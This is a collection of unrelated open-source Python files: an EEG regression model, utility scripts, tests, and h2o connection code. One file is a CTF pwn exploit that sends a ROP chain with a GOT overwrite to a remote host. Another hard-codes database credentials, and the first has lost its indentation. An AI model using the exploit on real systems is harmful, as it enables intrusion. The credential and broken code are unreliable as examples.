Note, lambda in this routine corresponds to the shrinkage parameter gamma
  in Blankertz et al. NeuroImage 58 (2011) 814-825, specifically used in Eq 13.
Args:
dataset: The tf.dataset from which to read data (dictionary item 'input_1'
and labels). Dataset is read once (so be sure repeat=1)
lamb: Regularization parameters for the least squares estimates.
use_offset: Whether to include the additive bias offset
use_ridge: Use ridge regression, instead of shrinkage for regularization.
Returns:
The estimated A and b matrices. As well as the two covariance matrices for
debugging, and the optimal shrinkage parameter.
Raises:
ValueError and/or TypeError for bad parameter values.
Automatic regularization (when lamb == -1) based on this paper:
http://perso.ens-lyon.fr/patrick.flandrin/LedoitWolf_JMA2004.pdf
"""
if not isinstance(dataset, tf.data.Dataset):
    raise TypeError('dataset input to '
                    'calculate_linear_regressor_parameters_from_dataset must '
                    'be a tf.data.Dataset object')
sum_x = 0.0
sum_xtx = 0.0
sum_x2tx2 = 0 # Accumulate sum of x2^T x2 for all minibatches
sum_xty = 0 # Accumulate sum of x^T y for all minibatches
num_mini_batches = 0
num_samples = 0 # Total number of samples
for x, y in dataset:
x = x['input_1'].numpy()
y = y.numpy()
num_rows = x.shape[0]
num_samples += num_rows
if use_offset:
# Append a column of 1's so we can compute an offset.
x = np.hstack((x, np.ones((num_rows, 1), dtype=x.dtype)))
sum_xtx += np.matmul(x.T, x)
sum_x += np.sum(x, axis=0, keepdims=True)
sum_xty += np.matmul(x.T, y)
    if lamb == -1:
      # Center with the running mean so far; an approximation of centering
      # with the full-dataset mean, used only for automatic regularization.
      xc = x - sum_x/num_samples
      x2 = xc ** 2
      sum_x2tx2 += np.matmul(x2.T, x2)
num_mini_batches += 1
logging.info('Calculate_linear_regressor_parameters_from_dataset: Processed '
'%d minibatches of size %d', num_mini_batches, num_rows)
cov_x = sum_xtx / num_samples
cov_xy = sum_xty / num_samples
mean_x = sum_x/num_samples
cov_x_zc = sum_xtx - np.matmul(mean_x.T, mean_x) # pytype: disable=attribute-error
n_col = cov_x.shape[0] # pytype: disable=attribute-error
mu = np.trace(cov_x_zc) / n_col
if use_ridge:
cov_x += lamb * np.identity(n_col)
shrinkage = lamb
else:
    if lamb == -1:
      # Ledoit-Wolf style automatic shrinkage (see the paper cited in the
      # docstring): delta measures the dispersion of the sample covariance
      # around its diagonal mean mu, and beta estimates the error in the
      # sample covariance itself.
      cov_x2 = sum_x2tx2 / num_samples
      delta_ = cov_x_zc.copy()
      delta_.flat[::n_col + 1] -= mu
      delta = (delta_**2).sum() / n_col
      beta_ = (1. / (n_col * num_samples) *
               np.sum(cov_x2 - (cov_x_zc ** 2)))
      beta = min(beta_, delta)
      shrinkage = beta / delta
elif lamb > 1 or lamb < 0:
# Shrinkage values are weird outside this range.
raise ValueError('Regularization lambda must be between 0 and 1, not %g.'%
lamb)
else:
shrinkage = lamb
logging.info('Shrinkage scaling is %g, %g, %g', shrinkage, lamb,
np.mean(np.trace(cov_x) / n_col))
  # Equation 12 of Blankertz. Shrink eigenvalues toward the mean.
cov_x = (1 - shrinkage) * cov_x + shrinkage * mu * np.identity(n_col)
solution = np.linalg.solve(cov_x, cov_xy)
if use_offset:
return solution[0:-1, :], solution[-1:, :], cov_x, cov_xy, shrinkage
else:
return solution, np.zeros((1,)), cov_x, cov_xy, shrinkage
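# A small self-contained check (illustrative only; sizes and values are
# arbitrary, not from the original module) of the closed-form solver above:
# build a dataset whose targets are a known linear function of the inputs and
# confirm the recovered weights and offset are close to the true ones.
def _linear_regressor_sanity_check():
  true_w = np.array([[2.0], [-1.0], [0.5]])
  x = np.random.randn(1000, 3).astype(np.float32)
  y = (np.matmul(x, true_w) + 3.0).astype(np.float32)
  dataset = tf.data.Dataset.from_tensor_slices(({'input_1': x}, y)).batch(100)
  w, b, _, _, _ = calculate_linear_regressor_parameters_from_dataset(
      dataset, lamb=0.0)
  np.testing.assert_allclose(w, true_w, atol=0.1)
  np.testing.assert_allclose(b, [[3.0]], atol=0.1)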
######################### Create DNN Regressor SubModel ########################
class BrainModelDNN(BrainModel):
"""A deep neural network regressor class.
"""
def __init__(self, input_dataset, num_hidden_list=None, **kwargs):
"""Creates model based on DNNs, a shim around basic Keras Model class.
Args:
input_dataset: Data used to figure out the network sizes.
num_hidden_list: A list of the number of hidden units in each layer.
      **kwargs: Arguments that are ignored and simply passed to the super class.
"""
if not isinstance(input_dataset, tf.data.Dataset):
      raise ValueError('Dataset must be a tf.data.Dataset, not a %s' %
                       type(input_dataset))
if num_hidden_list is None:
num_hidden_list = []
if not isinstance(num_hidden_list, list):
      raise TypeError('Num_hidden_list must be a list, not a %s.' %
                      type(num_hidden_list))
super(BrainModelDNN, self).__init__(**kwargs)
self._input_width = input_dataset.element_spec[0]['input_1'].shape[-1]
self._output_width = input_dataset.element_spec[1].shape[-1]
self._input_1 = tf.keras.Input(shape=self._input_width, name='input_1')
self.num_hidden_list = num_hidden_list
logging.info('Creating a BrainModelDNN with these hidden unit counts: %s',
num_hidden_list)
self._layer_list = []
for hidden_units in num_hidden_list:
self._layer_list.append(tf.keras.layers.Dense(hidden_units,
activation='relu'))
self._final_layer = tf.keras.layers.Dense(self._output_width,
activation=None)
def call(self, input_dataset):
layer_input = input_dataset['input_1']
for a_layer in self._layer_list:
layer_input = a_layer(layer_input)
return self._final_layer(layer_input)
def compile(self, optimizer=tf.keras.optimizers.RMSprop,
loss='mse',
metrics=(pearson_correlation_first, 'mse'),
learning_rate=1e-3, **kwargs):
"""Compile this model, applying the usual defaults for this classifier.
Args:
optimizer: Which Keras optimizer to use when training.
loss: How do we normally define the performance (loss) of the network.
metrics: Which metric(s) do we report after training.
learning_rate: A learning rate to pass to the optimizer
**kwargs: Arguments that are simply passed to the super class' compile().
"""
if callable(optimizer):
optimizer = optimizer(learning_rate=learning_rate)
super(BrainModelDNN, self).compile(
optimizer=optimizer, loss=loss, metrics=metrics, **kwargs)
def fit(self, input_dataset, **kwargs):
return super(BrainModelDNN, self).fit(input_dataset, None, **kwargs)
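# A hedged end-to-end sketch (illustrative only; all sizes are arbitrary and
# not part of the original module) of training the DNN regressor above on
# synthetic data.
def _dnn_regressor_example():
  x = np.random.randn(512, 8).astype(np.float32)
  y = np.random.randn(512, 2).astype(np.float32)
  dataset = tf.data.Dataset.from_tensor_slices(({'input_1': x}, y)).batch(64)
  model = BrainModelDNN(dataset, num_hidden_list=[16, 16])
  model.compile(metrics=['mse'])
  model.fit(dataset, epochs=2)
  return model.evaluate(dataset)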
####################### Create DNN Classifier SubModel ########################
class BrainModelClassifier(BrainModel):
"""A deep neural network classifier class.
Skip the model-building stage, and directly classify whether the audio and the
EEG are coincident.
"""
def __init__(self, input_dataset, num_hidden_list=None, **kwargs):
"""Creates model based classfifier, a shim around basic Keras Model class.
This takes two inputs, concatenates them, and optimizes a model that
predicts the output. This is generally used as a classifier, and more
    specifically a match-mismatch classifier.
Args:
      input_dataset: tf.data.Dataset used to figure out the network sizes.
num_hidden_list: A list of the number of hidden units in each layer.
**kwargs: Arguments that are simply passed to the super class.
"""
if not isinstance(input_dataset, tf.data.Dataset):
      raise TypeError('Dataset must be a tf.data.Dataset, not a %s' %
                      type(input_dataset))
if num_hidden_list is None:
num_hidden_list = []
if not isinstance(num_hidden_list, list):
      raise TypeError('Num_hidden_list must be a list, not a %s.' %
                      type(num_hidden_list))
super(BrainModelClassifier, self).__init__(**kwargs)
self._output_width = input_dataset.element_spec[1].shape[-1]
self.num_hidden_list = num_hidden_list
    logging.info('Creating a BrainModelClassifier with these hidden unit '
                 'counts: %s', num_hidden_list)
self._layer_list = [tf.keras.layers.Dense(hidden_units, activation='relu')
for hidden_units in num_hidden_list]
self._final_layer = tf.keras.layers.Dense(self._output_width,
activation='sigmoid')
def compile(self, optimizer=tf.keras.optimizers.Adam,
loss=tf.keras.losses.BinaryCrossentropy(),
metrics='accuracy', learning_rate=1e-3, **kwargs):
"""Compile this model, applying the usual defaults for this classifier.
Args:
optimizer: Which Keras optimizer to use when training.
loss: How do we normally define the performance (loss) of the network.
metrics: Which metric(s) do we report after training.
learning_rate: learning rate passed to the optimizer.
**kwargs: Arguments that are simply passed to the super class' compile().
"""
if callable(optimizer):
optimizer = optimizer(learning_rate=learning_rate)
super(BrainModelClassifier, self).compile(
optimizer=optimizer, loss=loss, metrics=metrics, **kwargs)
def call(self, input_dataset):
layer_input = tf.concat((input_dataset['input_1'],
input_dataset['input_2']),
axis=1)
for a_layer in self._layer_list:
layer_input = a_layer(layer_input)
return self._final_layer(layer_input)
def fit(self, input_dataset, **kwargs):
return super(BrainModelClassifier, self).fit(input_dataset, None, **kwargs)
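# A hedged sketch (illustrative only; all sizes are arbitrary and not part of
# the original module) of the two-input match/mismatch setup the classifier
# above expects: input_1 and input_2 are concatenated, and the label says
# whether the two signals were recorded together.
def _classifier_example():
  eeg = np.random.randn(512, 8).astype(np.float32)
  audio = np.random.randn(512, 4).astype(np.float32)
  labels = np.random.randint(0, 2, size=(512, 1)).astype(np.float32)
  dataset = tf.data.Dataset.from_tensor_slices(
      ({'input_1': eeg, 'input_2': audio}, labels)).batch(64)
  model = BrainModelClassifier(dataset, num_hidden_list=[16])
  model.compile()
  model.fit(dataset, epochs=2)
  return model.evaluate(dataset)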
|
google/telluride_decoding
|
telluride_decoding/brain_model.py
|
Python
|
apache-2.0
| 24,444
|
import pymysql

connection = pymysql.connect(host="127.0.0.1", port=3306, user="Renion",
                             passwd="password", db="recvdata")
cursor = connection.cursor()
# ALTER TABLE datatable ADD item INT DEFAULT self.j[item]
cursor.execute("SELECT original FROM datatable")
sql_data = cursor.fetchall()
cursor.close()
connection.close()
print(sql_data[0][0])

# The same query using the older MySQLdb-style API:
'''
db.query("SELECT original FROM datatable")
r = db.store_result()
print(r.fetch_row())
'''
|
enorenio/test
|
dsm/alt/mysqltest.py
|
Python
|
mit
| 450
|
#!/usr/bin/python
import hashlib
def escape(s):
d = {"\n":"\\n","\"":"\\\"","\\":"\\\\"}
return "".join(d[k] if k in d else k for k in s)
data = "#!/usr/bin/python\n\nimport hashlib\n\ndef escape(s):\n d = {\"\\n\":\"\\\\n\",\"\\\"\":\"\\\\\\\"\",\"\\\\\":\"\\\\\\\\\"}\n return \"\".join(d[k] if k in d else k for k in s)\n\ndata = \"$\"\n\ncontent = data.replace(chr(36),escape(data))\nprint(hashlib.md5(content).hexdigest())\n"
content = data.replace(chr(36),escape(data))
print(hashlib.md5(content).hexdigest())
|
sclereid/collections
|
quine/selfmd5.py
|
Python
|
mit
| 534
|
#!/usr/bin/env python
# standalone test harness for policy python code
from optparse import OptionParser
_message = {}
class Message:
def __init__(self):
pass
def getInboundProperty(self,key):
return _message[key] if key in _message else ''
def setInboundProperty(self,key,value):
_message[key] = value
parser = OptionParser()
parser.add_option('-g','--group',
type='string',
default='read openid create demo-netphone-admin update auth-columbia delete',
help='group list from idp adapter [default: %default]')
parser.add_option('-s','--scope',
type='string',
default='auth-columbia read openid',
help='scope list from access token [default: %default]')
parser.add_option('-r','--request',
type='string',
default='/v1/api/things',
help='HTTP request path: [default: %default]')
parser.add_option('-l','--listener',
type='string',
default='/v1/api/*',
help='HTTP listener path. [default: %default]')
parser.add_option('-m','--method',
type='string',
default='GET',
help='HTTP method [default: %default]')
parser.parse_args()  # optparse also stores the parsed values on parser.values
message = Message()
message.setInboundProperty('http.listener.path',parser.values.listener)
message.setInboundProperty('http.method',parser.values.method.upper())
message.setInboundProperty('http.request.path',parser.values.request)
payload = ''
# flowVars is a map but the value of _agwTokenContext is a string (that contains JSON)
flowVars={'_agwTokenContext':'{"access_token":{"uid":"ac45@columbia.edu","username":"ac45@columbia.edu","group": "%s"},"scope": "%s","token_type":"urn:pingidentity.com:oauth2:validated_token","expires_in":7195,"client_id":"64575d23b8504c9bb1e9e7ff558c3cd3"}'%(parser.values.group,parser.values.scope)}
import logging
log = logging.getLogger()
if not log.handlers:
handler = logging.StreamHandler()
formatter = logging.Formatter('%(levelname)-5s %(asctime)s %(message)s')
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(logging.DEBUG)
###
# paste below the generated python code from for example ~/AnypointStudio/workspace/.mule/policies/24940-235285.xml
# SNIP - SNIP - SNIP
###
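# The block below is NOT generated policy code: it is a hypothetical
# stand-in, for illustration only, showing the harness interface such code
# is expected to use (the `message` inbound properties and the `flowVars`
# token context populated above).
import json
token = json.loads(flowVars['_agwTokenContext'])
log.debug('method=%s path=%s listener=%s',
          message.getInboundProperty('http.method'),
          message.getInboundProperty('http.request.path'),
          message.getInboundProperty('http.listener.path'))
log.debug('token scope: %s', token['scope'])
log.debug('idp groups: %s', token['access_token']['group'])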
|
n2ygk/mulesoft-oauth2-scope-enforcer
|
test.py
|
Python
|
apache-2.0
| 2,376
|
from projectname.tests import *
class TestSampleController(TestController):
def test_set_lang(self):
response = self.app.get(url_for(controller='/sample', action='set_lang', lang='ja'))
        # Japanese for: 'Changed the language setting to "ja"'.
        assert u'\u8a00\u8a9e\u8a2d\u5b9a\u3092\u300cja\u300d\u306b\u5909\u66f4\u3057\u307e\u3057\u305f'.encode('utf-8') in response
response = self.app.get(url_for(controller='/sample', action='set_lang', lang='fr'))
assert 'Could not set language to "fr"' in response
def test_detect_lang(self):
response = self.app.get(url_for(controller='/sample', action='i18n_index'), headers={
'Accept-Language':'fr;q=0.6, en;q=0.1, ja;q=0.3'})
# expect japanese fallback for nonexistent french.
        # Japanese for: 'Root index page'.
        assert u'\u6839\u672c\u30a4\u30f3\u30c7\u30af\u30b9\u30da\u30fc\u30b8'.encode('utf-8') in response
def test_no_lang(self):
response = self.app.get(url_for(controller='/sample', action='no_lang'))
assert 'No language' in response
assert 'No languages' in response
|
santisiri/popego
|
envs/ALPHA-POPEGO/lib/python2.5/site-packages/Pylons-0.9.6.1-py2.5.egg/tests/test_webapps/filestotest/functional_sample_controller_i18n.py
|
Python
|
bsd-3-clause
| 1,038
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: file_util.py
"""distutils.file_util
Utility functions for operating on single files.
"""
__revision__ = '$Id$'
import os
from distutils.errors import DistutilsFileError
from distutils import log
_copy_action = {None: 'copying',
                'hard': 'hard linking',
                'sym': 'symbolically linking'}
def _copy_file_contents(src, dst, buffer_size=16384):
"""Copy the file 'src' to 'dst'.
Both must be filenames. Any error opening either file, reading from
'src', or writing to 'dst', raises DistutilsFileError. Data is
read/written in chunks of 'buffer_size' bytes (default 16k). No attempt
is made to handle anything apart from regular files.
"""
fsrc = None
fdst = None
try:
try:
fsrc = open(src, 'rb')
except os.error as (errno, errstr):
raise DistutilsFileError("could not open '%s': %s" % (src, errstr))
if os.path.exists(dst):
try:
os.unlink(dst)
except os.error as (errno, errstr):
raise DistutilsFileError("could not delete '%s': %s" % (dst, errstr))
try:
fdst = open(dst, 'wb')
except os.error as (errno, errstr):
raise DistutilsFileError("could not create '%s': %s" % (dst, errstr))
while 1:
try:
buf = fsrc.read(buffer_size)
except os.error as (errno, errstr):
raise DistutilsFileError("could not read from '%s': %s" % (src, errstr))
if not buf:
break
try:
fdst.write(buf)
except os.error as (errno, errstr):
raise DistutilsFileError("could not write to '%s': %s" % (dst, errstr))
finally:
if fdst:
fdst.close()
if fsrc:
fsrc.close()
return
def copy_file(src, dst, preserve_mode=1, preserve_times=1, update=0, link=None, verbose=1, dry_run=0):
"""Copy a file 'src' to 'dst'.
If 'dst' is a directory, then 'src' is copied there with the same name;
otherwise, it must be a filename. (If the file exists, it will be
ruthlessly clobbered.) If 'preserve_mode' is true (the default),
the file's mode (type and permission bits, or whatever is analogous on
the current platform) is copied. If 'preserve_times' is true (the
default), the last-modified and last-access times are copied as well.
If 'update' is true, 'src' will only be copied if 'dst' does not exist,
or if 'dst' does exist but is older than 'src'.
'link' allows you to make hard links (os.link) or symbolic links
(os.symlink) instead of copying: set it to "hard" or "sym"; if it is
None (the default), files are copied. Don't set 'link' on systems that
don't support it: 'copy_file()' doesn't check if hard or symbolic
linking is available.
Under Mac OS, uses the native file copy function in macostools; on
other systems, uses '_copy_file_contents()' to copy file contents.
Return a tuple (dest_name, copied): 'dest_name' is the actual name of
the output file, and 'copied' is true if the file was copied (or would
have been copied, if 'dry_run' true).
"""
from distutils.dep_util import newer
from stat import ST_ATIME, ST_MTIME, ST_MODE, S_IMODE
if not os.path.isfile(src):
raise DistutilsFileError("can't copy '%s': doesn't exist or not a regular file" % src)
if os.path.isdir(dst):
dir = dst
dst = os.path.join(dst, os.path.basename(src))
else:
dir = os.path.dirname(dst)
if update and not newer(src, dst):
if verbose >= 1:
log.debug('not copying %s (output up-to-date)', src)
return (dst, 0)
try:
action = _copy_action[link]
except KeyError:
raise ValueError("invalid value '%s' for 'link' argument" % link)
if verbose >= 1:
if os.path.basename(dst) == os.path.basename(src):
log.info('%s %s -> %s', action, src, dir)
else:
log.info('%s %s -> %s', action, src, dst)
if dry_run:
return (dst, 1)
if link == 'hard':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.link(src, dst)
elif link == 'sym':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.symlink(src, dst)
else:
_copy_file_contents(src, dst)
if preserve_mode or preserve_times:
st = os.stat(src)
if preserve_times:
os.utime(dst, (st[ST_ATIME], st[ST_MTIME]))
if preserve_mode:
os.chmod(dst, S_IMODE(st[ST_MODE]))
return (
dst, 1)
def move_file(src, dst, verbose=1, dry_run=0):
"""Move a file 'src' to 'dst'.
If 'dst' is a directory, the file will be moved into it with the same
name; otherwise, 'src' is just renamed to 'dst'. Return the new
full name of the file.
Handles cross-device moves on Unix using 'copy_file()'. What about
other systems???
"""
from os.path import exists, isfile, isdir, basename, dirname
import errno
if verbose >= 1:
log.info('moving %s -> %s', src, dst)
if dry_run:
return dst
if not isfile(src):
raise DistutilsFileError("can't move '%s': not a regular file" % src)
if isdir(dst):
dst = os.path.join(dst, basename(src))
elif exists(dst):
raise DistutilsFileError("can't move '%s': destination '%s' already exists" % (
src, dst))
if not isdir(dirname(dst)):
raise DistutilsFileError("can't move '%s': destination '%s' not a valid path" % (
src, dst))
copy_it = 0
try:
os.rename(src, dst)
except os.error as (num, msg):
if num == errno.EXDEV:
copy_it = 1
else:
raise DistutilsFileError("couldn't move '%s' to '%s': %s" % (src, dst, msg))
if copy_it:
copy_file(src, dst, verbose=verbose)
try:
os.unlink(src)
except os.error as (num, msg):
try:
os.unlink(dst)
except os.error:
pass
raise DistutilsFileError(("couldn't move '%s' to '%s' by copy/delete: " + "delete '%s' failed: %s") % (
src, dst, src, msg))
return dst
def write_file(filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
f = open(filename, 'w')
try:
for line in contents:
f.write(line + '\n')
finally:
f.close()
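# A short usage sketch (not part of the decompiled module; paths are
# placeholders): copy a file into a directory and then move it, using the
# helpers above. dry_run=1 keeps this side-effect free.
def _example_usage():
    new_name, copied = copy_file('setup.py', '/tmp', verbose=1, dry_run=1)
    log.info('would copy to %s (copied=%s)', new_name, copied)
    moved_name = move_file(new_name, '/tmp/setup-moved.py', verbose=1,
                           dry_run=1)
    log.info('would move to %s', moved_name)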
|
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Python/Core/Lib/distutils/file_util.py
|
Python
|
unlicense
| 6,802
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwnpwnpwn import *
from pwn import *
#host = "10.211.55.6"
#port = 8888
host = "128.199.152.175"
port = 10001
r = remote(host,port)
context.arch = "amd64"
# Brute force 4 bits of ASLR via a partial GOT overwrite.
payload = "a"*24                  # padding up to the saved return address
pop_rdi = 0x00000000004005c3      # gadget: pop rdi ; ret
pop_rsi_r15 = 0x00000000004005c1  # gadget: pop rsi ; pop r15 ; ret
read = 0x400400                   # read@plt
read_got = 0x0000000000601018     # read@got
# read(0, read_got, ...) rewrites read's GOT entry from stdin, then the
# chain returns into read again so the hijacked entry gets called.
payload += flat([pop_rdi,0,pop_rsi_r15,read_got,0,read,read]) + "\x00"*0x78
r.sendline(payload)
# Overwrite the low two bytes of read@got; the low 12 bits are fixed by page
# alignment, so only 4 bits have to be guessed.
r.send('\x67\x55')
r.interactive()
|
scwuaptx/CTF
|
2017-writeup/asis/start_hard.py
|
Python
|
gpl-2.0
| 485
|
#!/usr/bin/env python
import itertools as it
import ubelt as ub
def check_relationships(branches):
ancestors = {b: set() for b in branches}
    # itertools.combinations yields n-choose-2 pairs.
    length = len(branches) * (len(branches) - 1) // 2
for b1, b2 in ub.ProgIter(it.combinations(branches, 2), length=length):
ret = ub.cmd('git merge-base --is-ancestor {} {}'.format(b1, b2))['ret']
if ret == 0:
ancestors[b1].add(b2)
ret = ub.cmd('git merge-base --is-ancestor {} {}'.format(b2, b1))['ret']
if ret == 0:
ancestors[b2].add(b1)
print('<key> is an ancestor of <value>')
print(ub.repr2(ancestors))
descendants = {b: set() for b in branches}
for key, others in ancestors.items():
for o in others:
descendants[o].add(key)
print('<key> descends from <value>')
print(ub.repr2(descendants))
import plottool as pt
import networkx as nx
G = nx.DiGraph()
G.add_nodes_from(branches)
for key, others in ancestors.items():
for o in others:
# G.add_edge(key, o)
G.add_edge(o, key)
from networkx.algorithms.connectivity.edge_augmentation import collapse
    # Collapse 2-cycles (pairs of branches that each descend from the other,
    # i.e. point at the same commit) into a single node so the graph is a DAG.
    flag = True
G2 = G
while flag:
flag = False
for u, v in list(G2.edges()):
if G2.has_edge(v, u):
G2 = collapse(G2, [[u, v]])
node_relabel = ub.ddict(list)
for old, new in G2.graph['mapping'].items():
node_relabel[new].append(old)
G2 = nx.relabel_nodes(G2, {k: '\n'.join(v) for k, v in node_relabel.items()})
flag = True
break
G3 = nx.transitive_reduction(G2)
pt.show_nx(G3, arrow_width=1.5, prog='dot', layoutkw=dict(prog='dot'))
pt.zoom_factory()
pt.pan_factory()
pt.plt.show()
if __name__ == '__main__':
r"""
CommandLine:
export PYTHONPATH=$PYTHONPATH:/home/joncrall/misc
python ~/misc/git-branch-relationships.py
python ~/misc/git-branch-relationships.py "
jon/viame/master jon/viame/next master dev/tracking-framework
viame/master viame/query-wip viame/tracking-work
viame/master-no-pybind viame/master-w-pytorch
"
"""
# branches = [x.strip() for x in '''
# jon/viame/master
# jon/viame/next
# master
# dev/tracking-framework
# viame/master
# viame/query-wip
# viame/tracking-work
# viame/master-no-pybind
# viame/master-w-pytorch
# '''.splitlines() if x.strip()]
import sys
argv = sys.argv[1:]
branches = []
for item in argv:
for sub in item.split():
sub = sub.strip()
if sub:
branches.append(sub)
print('branches = {}'.format(ub.repr2(branches)))
check_relationships(branches)
|
Erotemic/local
|
git_tools/git_branch_relationships.py
|
Python
|
gpl-3.0
| 2,945
|
from selenium import webdriver
from selenium.webdriver.support.ui import Select
url_list = []
for index in range(0, 253):
profile = webdriver.FirefoxProfile()
profile.set_preference("permissions.default.image", 2)
profile.set_preference("permissions.default.script", 2)
profile.set_preference("permissions.default.stylesheet", 2)
profile.set_preference("permissions.default.subdocument", 2)
# profile.native_events_enabled = True
driver = webdriver.Firefox(profile)
driver.implicitly_wait(30)
base_url = "http://www.gadm.org/"
driver.get(base_url + "country")
Select(driver.find_element_by_name("cnt")).select_by_index(index)
driver.find_element_by_name("OK").click()
url = driver.find_element_by_css_selector("div.content a").get_attribute("href")
driver.quit()
url_list.append(url)
import subprocess
for url in url_list:
    # Launch the downloads in parallel; passing the URL as a list argument
    # avoids shell=True and any quoting problems.
    subprocess.Popen(["wget", url])
|
howl-anderson/SDMdata
|
install/get_gadm_data/main.py
|
Python
|
agpl-3.0
| 935
|
# -*- encoding: utf-8 -*-
"""
h2o -- module for using H2O services.
:copyright: (c) 2016 H2O.ai
:license: Apache License Version 2.0 (see LICENSE for details)
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import os
import warnings
import webbrowser
from h2o.backend import H2OConnection
from h2o.backend import H2OConnectionConf
from h2o.backend import H2OLocalServer
from h2o.exceptions import H2OConnectionError, H2OValueError
from h2o.utils.config import H2OConfigReader
from h2o.utils.shared_utils import check_frame_id, deprecated, gen_header, py_tmp_key, quoted, urlopen
from h2o.utils.typechecks import assert_is_type, assert_satisfies, BoundInt, BoundNumeric, I, is_type, numeric, U
from .estimators.deeplearning import H2OAutoEncoderEstimator
from .estimators.deeplearning import H2ODeepLearningEstimator
from .estimators.deepwater import H2ODeepWaterEstimator
from .estimators.estimator_base import H2OEstimator
from .estimators.xgboost import H2OXGBoostEstimator
from .estimators.gbm import H2OGradientBoostingEstimator
from .estimators.glm import H2OGeneralizedLinearEstimator
from .estimators.glrm import H2OGeneralizedLowRankEstimator
from .estimators.kmeans import H2OKMeansEstimator
from .estimators.naive_bayes import H2ONaiveBayesEstimator
from .estimators.random_forest import H2ORandomForestEstimator
from .estimators.stackedensemble import H2OStackedEnsembleEstimator
from .estimators.word2vec import H2OWord2vecEstimator
from .expr import ExprNode
from .frame import H2OFrame
from .grid.grid_search import H2OGridSearch
from .job import H2OJob
from .model.model_base import ModelBase
from .transforms.decomposition import H2OPCA
from .transforms.decomposition import H2OSVD
from .utils.debugging import * # NOQA
from .utils.compatibility import * # NOQA
from .utils.compatibility import PY3
logging.basicConfig()
# An IPython deprecation warning is triggered after h2o.init(). Remove this once the deprecation has been resolved
warnings.filterwarnings('ignore', category=DeprecationWarning, module='.*/IPython/.*')
h2oconn = None # type: H2OConnection
def connect(server=None, url=None, ip=None, port=None, https=None, verify_ssl_certificates=None, auth=None,
            proxy=None, cookies=None, verbose=True, config=None):
"""
Connect to an existing H2O server, remote or local.
There are two ways to connect to a server: either pass a `server` parameter containing an instance of
an H2OLocalServer, or specify `ip` and `port` of the server that you want to connect to.
:param server: An H2OLocalServer instance to connect to (optional).
:param url: Full URL of the server to connect to (can be used instead of `ip` + `port` + `https`).
:param ip: The ip address (or host name) of the server where H2O is running.
:param port: Port number that H2O service is listening to.
:param https: Set to True to connect via https:// instead of http://.
:param verify_ssl_certificates: When using https, setting this to False will disable SSL certificates verification.
:param auth: Either a (username, password) pair for basic authentication, or one of the requests.auth
authenticator objects.
:param proxy: Proxy server address.
:param cookies: Cookie (or list of) to add to request
:param verbose: Set to False to disable printing connection status messages.
    :param config: Connection configuration object encapsulating connection parameters.
:returns: the new :class:`H2OConnection` object.
"""
global h2oconn
if config:
if "connect_params" in config:
h2oconn = _connect_with_conf(config["connect_params"])
else:
h2oconn = _connect_with_conf(config)
else:
h2oconn = H2OConnection.open(server=server, url=url, ip=ip, port=port, https=https,
auth=auth, verify_ssl_certificates=verify_ssl_certificates,
                                      proxy=proxy, cookies=cookies,
verbose=verbose)
h2oconn.cluster.timezone = "UTC"
if verbose:
h2oconn.cluster.show_status()
return h2oconn
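# A hedged usage sketch (not part of the original module; the address below
# is a placeholder, not a real deployment) of the two documented ways to
# reach a server:
def _connect_examples():
    conn = connect(url="http://localhost:54321")   # by full URL
    conn = connect(ip="localhost", port=54321)     # ...or by ip + port
    return conn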
def api(endpoint, data=None, json=None, filename=None, save_to=None):
"""
Perform a REST API request to a previously connected server.
This function is mostly for internal purposes, but may occasionally be useful for direct access to
the backend H2O server. It has same parameters as :meth:`H2OConnection.request <h2o.backend.H2OConnection.request>`.
"""
# type checks are performed in H2OConnection class
_check_connection()
return h2oconn.request(endpoint, data=data, json=json, filename=filename, save_to=save_to)
def connection():
"""Return the current :class:`H2OConnection` handler."""
return h2oconn
def version_check():
"""Used to verify that h2o-python module and the H2O server are compatible with each other."""
from .__init__ import __version__ as ver_pkg
ci = h2oconn.cluster
if not ci:
raise H2OConnectionError("Connection not initialized. Did you run h2o.connect()?")
ver_h2o = ci.version
if ver_pkg == "SUBST_PROJECT_VERSION": ver_pkg = "UNKNOWN"
if str(ver_h2o) != str(ver_pkg):
branch_name_h2o = ci.branch_name
build_number_h2o = ci.build_number
if build_number_h2o is None or build_number_h2o == "unknown":
raise H2OConnectionError(
"Version mismatch. H2O is version {0}, but the h2o-python package is version {1}. "
"Upgrade H2O and h2o-Python to latest stable version - "
"http://h2o-release.s3.amazonaws.com/h2o/latest_stable.html"
"".format(ver_h2o, ver_pkg))
elif build_number_h2o == "99999":
raise H2OConnectionError(
"Version mismatch. H2O is version {0}, but the h2o-python package is version {1}. "
"This is a developer build, please contact your developer."
"".format(ver_h2o, ver_pkg))
else:
raise H2OConnectionError(
"Version mismatch. H2O is version {0}, but the h2o-python package is version {1}. "
"Install the matching h2o-Python version from - "
"http://h2o-release.s3.amazonaws.com/h2o/{2}/{3}/index.html."
"".format(ver_h2o, ver_pkg, branch_name_h2o, build_number_h2o))
# Check age of the install
if ci.build_too_old:
print("Warning: Your H2O cluster version is too old ({})! Please download and install the latest "
"version from http://h2o.ai/download/".format(ci.build_age))
def init(url=None, ip=None, port=None, https=None, insecure=None, username=None, password=None,
cookies=None, proxy=None, start_h2o=True, nthreads=-1, ice_root=None, enable_assertions=True,
max_mem_size=None, min_mem_size=None, strict_version_check=None, ignore_config=False,
extra_classpath=None, **kwargs):
"""
Attempt to connect to a local server, or if not successful start a new server and connect to it.
:param url: Full URL of the server to connect to (can be used instead of `ip` + `port` + `https`).
:param ip: The ip address (or host name) of the server where H2O is running.
:param port: Port number that H2O service is listening to.
:param https: Set to True to connect via https:// instead of http://.
:param insecure: When using https, setting this to True will disable SSL certificates verification.
    :param username: The username for basic authentication.
    :param password: The password for basic authentication.
:param cookies: Cookie (or list of) to add to each request.
:param proxy: Proxy server address.
:param start_h2o: If False, do not attempt to start an h2o server when connection to an existing one failed.
:param nthreads: "Number of threads" option when launching a new h2o server.
:param ice_root: Directory for temporary files for the new h2o server.
:param enable_assertions: Enable assertions in Java for the new h2o server.
